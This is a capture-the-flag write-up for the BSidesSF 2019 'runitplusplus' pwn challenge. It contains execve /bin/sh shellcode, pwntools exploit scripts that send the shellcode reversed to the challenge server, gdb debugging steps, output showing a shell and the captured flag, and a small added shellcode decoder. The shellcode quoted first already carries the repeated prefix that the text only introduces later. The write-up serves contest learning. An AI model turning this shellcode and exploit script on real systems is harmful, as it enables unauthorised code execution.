[Pwn] BsidesSF 2019 - runitplusplus

runitplusplus 52

Description:
This is the same as runit, except requires a bit of reversing! Grab the flag from /home/ctf/flag.txt

Location - runitplusplus-a36bf652.challenges.bsidessf.net:5353

runitplusplus

As the description says, this is the same as the runit challenge but with a bit of reversing:

The shellcode I used for this was \x31\xC0\x31\xD2\x31\xC0\x31\xD2\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x53\x89\xE1\xB0\x0B\xCD\x80; if we use this website to check what this shellcode does:

Everything looks right: we clear EAX and EDX at the beginning, push the /bin/sh string onto the stack and put its address in ECX, EDX must be zero because it is the envp argument, and EAX is 0xb, the execve system call number. So now we just need to reverse this shellcode; we can use Python to do that, in my case with [::-1], which reverses the string:

from pwn import *

host = 'runitplusplus-a36bf652.challenges.bsidessf.net'
port = 5353
local = True                      # True: run the local binary under gdb
filename = 'runitplusplus'

def getConn():
    # d = os.environ
    # d['LD_PRELOAD'] = './libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253'
    return process(filename) if local else remote(host, port)

# execve("/bin//sh") shellcode, sent reversed because the binary reverses the input
SHELLCODE = b'\x31\xC0\x31\xD2\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x53\x89\xE1\xB0\x0B\xCD\x80'[::-1]
r = getConn()
# break right before the CALL EAX that jumps into the buffer
gdb.attach(r, '''
b *0x8048680
c
''')
print(r.recv())
r.sendline(SHELLCODE)
r.interactive()

So let's put a breakpoint on the address 0x8048680, which is right before the program does CALL EAX, step in, and see what happened to the shellcode after that for loop ran:

To get around this, what I did was repeat the first 4 bytes of my shellcode, which are the xor eax,eax and xor edx,edx instructions:

So we add this to our original shellcode and get \x31\xC0\x31\xD2\x31\xC0\x31\xD2\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x53\x89\xE1\xB0\x0B\xCD\x80, which in assembly is:
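As an added example (not part of the original writeup), here is a small decoder that handles only the x86-32 opcodes present in these two shellcodes, so the bytes above can be checked offline instead of through a website; it also reassembles the string the push instructions leave on the stack and lets you confirm that the final payload is just the first 4 bytes prepended to the original.

```python
import struct

# Added example, not part of the original writeup: a decoder for only the
# x86-32 opcodes that occur in this shellcode, so the bytes can be checked
# offline. Anything outside that subset raises instead of guessing.
REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# Both byte strings are copied from the writeup above.
ORIGINAL = (b'\x31\xC0\x31\xD2\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E'
            b'\x89\xE3\x50\x53\x89\xE1\xB0\x0B\xCD\x80')
FINAL = (b'\x31\xC0\x31\xD2\x31\xC0\x31\xD2\x50\x68\x2F\x2F\x73\x68\x68\x2F'
         b'\x62\x69\x6E\x89\xE3\x50\x53\x89\xE1\xB0\x0B\xCD\x80')

def decode(code):
    """Return [(offset, mnemonic), ...] for the supported opcode subset."""
    out, i = [], 0
    while i < len(code):
        op = code[i]
        if op in (0x31, 0x89):                 # xor / mov r/m32, r32
            modrm = code[i + 1]
            if modrm >> 6 != 3:
                raise ValueError("only register-direct ModRM is handled")
            src, dst = REGS[(modrm >> 3) & 7], REGS[modrm & 7]
            out.append((i, "%s %s, %s" % ("xor" if op == 0x31 else "mov", dst, src)))
            i += 2
        elif 0x50 <= op <= 0x57:               # push r32
            out.append((i, "push " + REGS[op - 0x50]))
            i += 1
        elif op == 0x68:                       # push imm32 (the string pieces)
            imm = struct.unpack("<I", code[i + 1:i + 5])[0]
            text = code[i + 1:i + 5].decode("latin-1")
            out.append((i, "push 0x%08x ; '%s'" % (imm, text)))
            i += 5
        elif op == 0xB0:                       # mov al, imm8 (syscall number)
            out.append((i, "mov al, 0x%x" % code[i + 1]))
            i += 2
        elif op == 0xCD:                       # int imm8
            out.append((i, "int 0x%x" % code[i + 1]))
            i += 2
        else:
            raise ValueError("unsupported opcode 0x%02x at offset %d" % (op, i))
    return out

def pushed_string(code):
    """Reassemble the string the push-imm32 sequence leaves on the stack;
    later pushes land at lower addresses, so they come first in memory."""
    chunks = [code[i + 1:i + 5] for i, _ in decode(code) if code[i] == 0x68]
    return b"".join(reversed(chunks)).decode("latin-1")
```

Call decode(FINAL) to list the instructions with their offsets and pushed_string(FINAL) to see the string left on the stack.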

So let's check how it looks in gdb with the breakpoint:

Now that everything is fine, we are ready to run the script against the server:

from pwn import *

host = 'runitplusplus-a36bf652.challenges.bsidessf.net'
port = 5353
local = False                     # False: connect to the challenge server
filename = 'runitplusplus'

def getConn():
    # d = os.environ
    # d['LD_PRELOAD'] = './libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253'
    return process(filename) if local else remote(host, port)

# same shellcode with the first 4 bytes (xor eax,eax / xor edx,edx) repeated,
# still sent reversed because the binary reverses the input
SHELLCODE = b'\x31\xC0\x31\xD2\x31\xC0\x31\xD2\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x53\x89\xE1\xB0\x0B\xCD\x80'[::-1]
r = getConn()
# gdb.attach(r, '''
# b *0x8048680
# c
# ''')
print(r.recv())
r.sendline(SHELLCODE)
r.interactive()

Now running it:

$ python runitplusplus.py 
[+] Opening connection to runitplusplus-a36bf652.challenges.bsidessf.net on port 5353: Done
Send me stuff!!
[*] Switching to interactive mode

$ cat home/ctf/flag.txt
{ti_nar_uoy}FTC
[*] Got EOF while reading in interactive
$
$
[*] Closed connection to runitplusplus-a36bf652.challenges.bsidessf.net port 5353
[*] Got EOF while sending in interactive

The flag was {ti_nar_uoy}FTC